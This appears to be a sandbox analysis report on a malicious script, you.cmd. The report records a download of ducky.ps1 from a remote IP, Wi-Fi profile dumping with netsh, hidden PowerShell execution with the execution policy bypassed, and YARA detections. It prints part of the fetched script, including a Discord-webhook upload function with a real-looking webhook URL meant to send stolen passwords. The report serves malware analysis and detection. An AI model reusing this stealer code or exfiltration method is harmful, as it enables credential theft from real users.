GetAdaptersAddresses Dec. 6, 2023, 12:09 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (1 event)

Data received

HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 03:28:04 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 30 Dec 2022 23:09:18 GMT ETag: "17a1-5f113b0f28c34" Accept-Ranges: bytes Content-Length: 6049 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive #color test function Write-ColorOutput($ForegroundColor) { # save the current color $fc = $host.UI.RawUI.ForegroundColor # set the new color $host.UI.RawUI.ForegroundColor = $ForegroundColor # output if ($args) { Write-Output $args } else { $input | Write-Output } # restore the original color $host.UI.RawUI.ForegroundColor = $fc } # Check if i have admin function IfAdmin { $user = [Security.Principal.WindowsIdentity]::GetCurrent(); $isAdmin = (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator) if($isAdmin){ Write-coloroutput red ('Is Admin') } else{ Write-coloroutput blue ('Not Admin') } } #Discord webhook to send the password to function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'https://discord.com/api/webhooks/1037775315298160641/e2K8qx0pF-b2i59Vns0QiUy9a0RdD4SZC_SzLhlMWM1E_Ue3R4keE3YfSEtNiWPjGAC_' $Body = @{ 'username' = $

Poweshell is sending data to a remote host (1 event)

Data sent

GET /ducky.ps1 HTTP/1.1 Host: 3.75.162.63 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Dec. 6, 2023, 12:09 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Windows\system32\netsh.exe" wlan show profiles

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	select * from Win32_NetworkAdapterConfiguration

Communicates with host for which no DNS query was performed (1 event)

host

3.75.162.63

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Dec. 6, 2023, 12:09 p.m.	buffer: GET /ducky.ps1 HTTP/1.1 Host: 3.75.162.63 Connection: Keep-Alive socket: 1420 sent: 70	1	70	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\system32\netsh.exe" wlan show profiles

Creates a suspicious Powershell process (2 events)

option	-executionpolicy bypass				value	Attempts to bypass execution policy
option	-window hidden				value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\netsh.exe

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (33 events)

dead_host	192.168.56.103:49193
dead_host	192.168.56.103:49181
dead_host	192.168.56.103:49190
dead_host	192.168.56.103:49177
dead_host	192.168.56.103:49186
dead_host	192.168.56.103:49174
dead_host	192.168.56.103:49201
dead_host	192.168.56.103:49198
dead_host	192.168.56.103:49170
dead_host	192.168.56.103:49191
dead_host	192.168.56.103:49182
dead_host	192.168.56.103:49187
dead_host	192.168.56.103:49178
dead_host	192.168.56.103:49199
dead_host	192.168.56.103:49171
dead_host	192.168.56.103:49188
dead_host	192.168.56.103:49202
dead_host	192.168.56.103:49195
dead_host	192.168.56.103:49183
dead_host	192.168.56.103:49184
dead_host	192.168.56.103:49179
dead_host	192.168.56.103:49196
dead_host	192.168.56.103:49189
dead_host	192.168.56.103:49203
dead_host	192.168.56.103:49192
dead_host	192.168.56.103:49180
dead_host	192.168.56.103:49185
dead_host	192.168.56.103:49173
dead_host	3.75.162.63:443
dead_host	192.168.56.103:49176
dead_host	192.168.56.103:49197
dead_host	192.168.56.103:49169
dead_host	192.168.56.103:49200

you.cmd

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All